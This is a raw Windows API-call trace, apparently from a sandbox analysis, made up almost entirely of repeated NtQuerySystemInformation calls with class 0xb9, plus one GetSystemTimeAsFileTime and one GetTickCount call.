NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0283.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0283.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0283.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0283.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd90, Length=0x28, ResultLength=0x0) [0283.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0283.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x28, ResultLength=0x0) [0283.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce10, Length=0x28, ResultLength=0x0) [0283.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.706] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0283.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x20, ResultLength=0x0) [0283.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0283.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0283.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x20, ResultLength=0x0) [0283.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cef0, Length=0x38, ResultLength=0x0) [0283.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x20, ResultLength=0x0) [0283.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0283.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x20, ResultLength=0x0) [0283.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.709] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa78207d020 | out: lpSystemTimeAsFileTime=0xa78207d020*(dwLowDateTime=0x367194af, dwHighDateTime=0x1d6666a)) [0283.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0d8, Length=0x50, ResultLength=0x0) [0283.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x28, ResultLength=0x0) [0283.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf28, Length=0x50, ResultLength=0x0) [0283.710] GetTickCount () returned 0x1186fbf [0283.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0283.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb40, Length=0x28, ResultLength=0x0) [0283.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x28, ResultLength=0x0) [0283.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0283.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x38, ResultLength=0x0) [0283.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x20, ResultLength=0x0) [0283.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x20, ResultLength=0x0) [0283.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0283.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.728] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x28, ResultLength=0x0) [0283.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb80, Length=0x28, ResultLength=0x0) [0283.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0283.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x20, ResultLength=0x0) [0283.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0283.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x20, ResultLength=0x0) [0283.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x38, ResultLength=0x0) [0283.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0283.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caf0, Length=0x20, ResultLength=0x0) [0283.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf8, Length=0x58, ResultLength=0x0) [0283.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0283.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0283.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) 